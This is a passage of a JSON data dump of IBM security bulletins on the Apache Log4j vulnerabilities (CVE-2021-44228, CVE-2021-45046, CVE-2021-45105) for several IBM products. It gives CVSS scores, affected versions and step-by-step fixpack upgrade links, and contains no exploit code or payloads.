\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Machine Learning in Cloud Pak for Data| 4.0.4 \n \n\n\n## Remediation/Fixes\n\n**Affected Product(s)**| **Version(s)**| **Fixes** \n---|---|--- \nWatson Machine Learning in Cloud Pak for Data| 4.0.4| Get the latest Watson Machine Learning by upgrading to [4.0.5](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions#versions__cpd-platform> \"4.0.5\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T02:08:48", "type": "ibm", "title": "Security Bulletin: IBM Watson Machine Learning in Cloud Pak for Data is 
vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T02:08:48", "id": "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "href": "https://www.ibm.com/support/pages/node/6551316", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nIBM Data Risk Manager (IDRM) 2.0.6.10 and earlier is impacted by Log4j (CVE-2021-45105, CVE-2021-45046). This vulnerability has been addressed in the updated version of IDRM 2.0.6.11, which includes Apache Log4j 2.17.1. Please see the remediation steps below to apply the fix. All customers are encouraged to act quickly to update their systems.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM DRM| 2.0.6 \n \n\n\n## Remediation/Fixes\n\nTo obtain fixes for all reported issues, customers are advised first to upgrade to v2.0.6.10, and then apply the latest FixPack 2.0.6.11. \n\n**NOTE:** The FixPack is not cumulative. 
So it must be applied on top of 2.0.6.10 in sequence.\n\n_Product_| _VRMF_| _APAR \n_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Data Risk Manager| 2.0.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.1_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.4.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"\" )\n\n5) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n9) Apply 
[DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n10) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n11) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.1| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n4) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n7) Apply 
[DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n10) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.2| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n3) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n6) Apply 
[DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.3| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n2) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n6) Apply 
[DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.4| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n7) Apply 
[DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.5| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n2) Apply 
[DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.7| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.8| \n\n-\n\n| \n\n1) Apply 
[DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.9| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.10| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T15:33:00", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j 
affects IBM Data Risk Manager (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T15:33:00", "id": "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "href": "https://www.ibm.com/support/pages/node/6540606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:08", "description": "## Summary\n\nApache Log4j is included in WebSphere Application Server (WAS), which is distributed with IBM Stored IQ for Legal. There are multiple Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105, CVE-2021-45046) impacting the IBM StoredIQ for Legal application. IBM StoredIQ for Legal uses Apache Log4j for logging. The interim fix PH42762 removes Apache Log4j from WAS.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker-controlled LDAP and other JNDI-related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. 
\nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM StoredIQ for Legal| 2.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nFor the affected version specified above, apply [PH42762](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/StoredIQ+for+Legal&release=2.0.3.14&platform=All&function=all> \"PH42762\" ) interim fix on top of WAS 8.5.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T04:16:49", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM StoredIQ for Legal is vulnerable to arbitrary code execution (CVE-2021-44228, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T04:16:49", "id": 
"18433120583E82C639DDC6BF1D76EF365C9C500B0A9CC0AE663BA4BE32DC9232", "href": "https://www.ibm.com/support/pages/node/6540518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:53", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Apache Log4j.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
